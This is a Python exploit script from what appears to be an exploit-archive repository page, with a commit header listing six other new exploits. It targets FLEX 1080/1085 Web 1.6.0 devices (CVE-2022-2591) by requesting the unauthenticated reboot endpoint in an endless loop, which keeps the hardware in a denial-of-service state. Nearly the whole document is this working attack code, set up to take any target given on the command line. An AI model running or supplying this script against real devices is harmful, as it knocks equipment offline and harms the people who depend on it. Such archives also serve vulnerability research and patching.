bfc4baf25a
7 changes to exploits/shellcodes/ghdb FLEX 1080 < 1085 Web 1.6.0 - Denial of Service Epson Stylus SX510W Printer Remote Power Off - Denial of Service Job Portal 1.0 - File Upload Restriction Bypass Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
58 lines
No EOL
1.6 KiB
Python
Executable file
58 lines
No EOL
1.6 KiB
Python
Executable file
# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
|
|
# Date: 2023-05-06
|
|
# Exploit Author: Mr Empy
|
|
# Vendor Homepage: https://www.tem.ind.br/
|
|
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
|
|
# Version: 1.6.0
|
|
# Tested on: Android
|
|
# CVE ID: CVE-2022-2591
|
|
#!/usr/bin/env python3
|
|
import requests
|
|
import re
|
|
import argparse
|
|
from colorama import Fore
|
|
import time
|
|
|
|
def main():
|
|
def banner():
|
|
print('''
|
|
________ _______ __
|
|
/ ____/ / / ____/ |/ /
|
|
/ /_ / / / __/ | /
|
|
/ __/ / /___/ /___ / |
|
|
/_/ /_____/_____//_/|_|
|
|
|
|
[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
|
|
|
|
''')
|
|
def reboot():
|
|
r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
|
|
if 'Rebooting' in r.text:
|
|
pass
|
|
else:
|
|
print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
|
|
não é vulnerável')
|
|
quit()
|
|
|
|
banner()
|
|
print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
|
|
while True:
|
|
try:
|
|
reboot()
|
|
print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
|
|
derrubado com sucesso!')
|
|
time.sleep(1)
|
|
except:
|
|
# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
|
|
está inativo')
|
|
pass
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('-t','--target', action='store', help='Target',
|
|
dest='target', required=True)
|
|
arguments = parser.parse_args()
|
|
try:
|
|
main()
|
|
except KeyError:
|
|
quit() |